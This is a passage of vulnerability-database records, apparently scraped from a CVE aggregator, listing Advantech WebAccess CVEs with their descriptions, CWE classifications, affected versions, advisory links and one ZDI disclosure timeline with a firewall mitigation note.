an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3181", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-131", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ] }, "id": "VAR-201602-0488", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:07:07.742000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-131", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-131", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-131", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess datacore Service datacore.exe strcpy Heap-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ], "trust": 0.7 } }
cve-2017-12704
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.536Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "A heap-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to the heap-based buffer, which could allow an attacker to execute arbitrary code under the context of the process." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-122", "description": "CWE-122", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12704", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A heap-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to the heap-based buffer, which could allow an attacker to execute arbitrary code under the context of the process." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-122" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12704", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.536Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-10607
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-086-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Versions 8.4.2 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:06:10.090Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-086-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Versions 8.4.2 and prior" } ] } ], "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess, Versions 8.4.2 and prior. A stack-based buffer overflow vulnerability caused by a lack of proper validation of the length of user-supplied data may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-03-27T13:27:24", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-086-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-10607", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Versions 8.4.2 and prior" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess, Versions 8.4.2 and prior. A stack-based buffer overflow vulnerability caused by a lack of proper validation of the length of user-supplied data may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-086-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-086-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-10607", "datePublished": "2020-03-27T13:27:24", "dateReserved": "2020-03-16T00:00:00", "dateUpdated": "2024-08-04T11:06:10.090Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12006
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-589/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-605/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-595/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:57.582Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-589/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-605/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-595/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application\u2019s control." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-23", "description": "RELATIVE PATH TRAVERSAL CWE-23", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T20:06:07", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-589/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-605/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-595/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12006", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application\u2019s control." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "RELATIVE PATH TRAVERSAL CWE-23" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-589/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-589/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-605/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-605/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-595/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-595/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12006", "datePublished": "2020-05-08T11:41:41", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:57.582Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0853
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.066Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess before 8.1 allows remote attackers to obtain sensitive information via crafted input." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0853", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess before 8.1 allows remote attackers to obtain sensitive information via crafted input." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0853", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.066Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-4528
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T00:32:25.507Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-06-21T00:00:00", "descriptions": [ { "lang": "en", "value": "Buffer overflow in Advantech WebAccess before 8.1_20160519 allows local users to cause a denial of service via a crafted DLL file." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-06-25T01:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-4528", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Buffer overflow in Advantech WebAccess before 8.1_20160519 allows local users to cause a denial of service via a crafted DLL file." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-4528", "datePublished": "2016-06-25T01:00:00", "dateReserved": "2016-05-05T00:00:00", "dateUpdated": "2024-08-06T00:32:25.507Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12713
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.614Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "An Incorrect Permission Assignment for Critical Resource issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Multiple files and folders with ACLs that affect other users are allowed to be modified by non-administrator accounts." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-732", "description": "CWE-732", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12713", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Incorrect Permission Assignment for Critical Resource issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Multiple files and folders with ACLs that affect other users are allowed to be modified by non-administrator accounts." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-732" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12713", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.614Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12026
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-626/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:57.082Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-626/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application\u2019s control." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-23", "description": "RELATIVE PATH TRAVERSAL CWE-23", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T20:06:12", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-626/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12026", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application\u2019s control." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "RELATIVE PATH TRAVERSAL CWE-23" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-626/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-626/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12026", "datePublished": "2020-05-08T11:48:19", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:57.082Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12019
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-161-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | WebAccess Node |
Version: Version 8.4.4 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:57.802Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-161-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Version 8.4.4 and prior" } ] } ], "descriptions": [ { "lang": "en", "value": "WebAccess Node Version 8.4.4 and prior is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-06-15T19:08:06", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-161-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12019", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess Node", "version": { "version_data": [ { "version_value": "Version 8.4.4 and prior" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "WebAccess Node Version 8.4.4 and prior is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-161-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-161-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12019", "datePublished": "2020-06-15T19:08:06", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:57.802Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-15707
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.exploit-db.com/exploits/45774/ | exploit, x_refsource_EXPLOIT-DB | |
https://www.tenable.com/security/research/tra-2018-35 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: 8.3.1 and 8.3.2 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T10:01:54.390Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "45774", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/45774/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2018-35" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.3.1 and 8.3.2" } ] } ], "datePublic": "2018-10-31T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.1 and 8.3.2 are vulnerable to cross-site scripting in the Bwmainleft.asp page. An attacker could leverage this vulnerability to disclose credentials amongst other things." } ], "problemTypes": [ { "descriptions": [ { "description": "Cross-site Scripting", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-11-07T10:57:01", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "name": "45774", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/45774/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2018-35" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "DATE_PUBLIC": "2018-10-31T00:00:00", "ID": "CVE-2018-15707", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "8.3.1 and 8.3.2" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.1 and 8.3.2 are vulnerable to cross-site scripting in the Bwmainleft.asp page. An attacker could leverage this vulnerability to disclose credentials amongst other things." } ] }, "problemtype": { 